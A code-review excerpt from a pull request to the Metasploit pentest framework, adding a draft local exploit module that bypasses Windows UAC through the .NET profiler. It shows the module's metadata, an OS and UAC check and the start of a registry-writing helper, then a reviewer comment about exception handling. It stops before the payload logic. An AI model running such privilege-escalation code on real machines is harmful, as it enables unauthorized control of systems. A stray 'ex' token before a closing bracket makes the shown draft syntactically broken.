modules/exploits/windows/local/bypassuac_dotnet_profiler.rb

```diff
@@ -0,0 +1,196 @@
+class MetasploitModule < Msf::Exploit::Local
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::EXE
+  include Msf::Exploit::FileDropper
+  include Post::Windows::Priv
+  include Post::Windows::Runas
+
+  def initialize(info={})
+    super(update_info(info,
+      'Name'          => 'Windows Escalate UAC Protection Bypass (Via dot net profiler)',
+      'Description'   => %q(
+      TBA
+      ),
+      'License'       => MSF_LICENSE,
+      'Author'        => [
+          'Casey Smith',   # UAC bypass discovery and research
+          '"Stefan Kanthak" <stefan.kanthak () nexgo de>',   # UAC bypass discovery and research
+          'bwatters-r7', # Module
+        ],
+      'Platform'      => ['win'],
+      'SessionTypes'  => ['meterpreter'],
+      'Targets'       => [
+          [ 'Windows x64', { 'Arch' => ARCH_X64 } ]
+      ],
+      'DefaultTarget' => 0,
+      'Notes'         =>
+        {
+          'SideEffects' => [ ARTIFACTS_ON_DISK ]
+        },
+      'References'    =>
+        [
+          ['URL', 'https://seclists.org/fulldisclosure/2017/Jul/11'],
+          ['URL', 'https://offsec.provadys.com/UAC-bypass-dotnet.html']
+ex        ],
+      'DisclosureDate' => 'Mar 17 2017'
+      )
+    )
+    register_options(
+      [OptString.new('PAYLOAD_NAME', [false, 'The filename to use for the payload binary (%RAND% by default).', nil])]
+    )
+
+  end
+
+  def check
+    if sysinfo['OS'] =~ /Windows (7|8|2008|2012|10)/ && is_uac_enabled?
+      Exploit::CheckCode::Appears
+    else
+      Exploit::CheckCode::Safe
+    end
+  end
+
+  def write_reg_value(registry_hash)
+    vprint_status("Writing #{registry_hash[:value_name]} to #{registry_hash[:key_name]}")
+    begin
+      if not registry_key_exist?(registry_hash[:key_name])
+        registry_createkey(registry_hash[:key_name])
+        registry_hash[:delete_on_cleanup] = true
+      else
+        registry_hash[:delete_on_cleanup] = false
+      end
+      registry_setvaldata(registry_hash[:key_name], \
+                          registry_hash[:value_name], \
+                          registry_hash[:value_value], \
+                          registry_hash[:value_type])
+    rescue ::Exception => e
```

Comment:
This definitely shouldn't catch `::Exception` in the final version, and preferably should list the specific exceptions (or class of exceptions).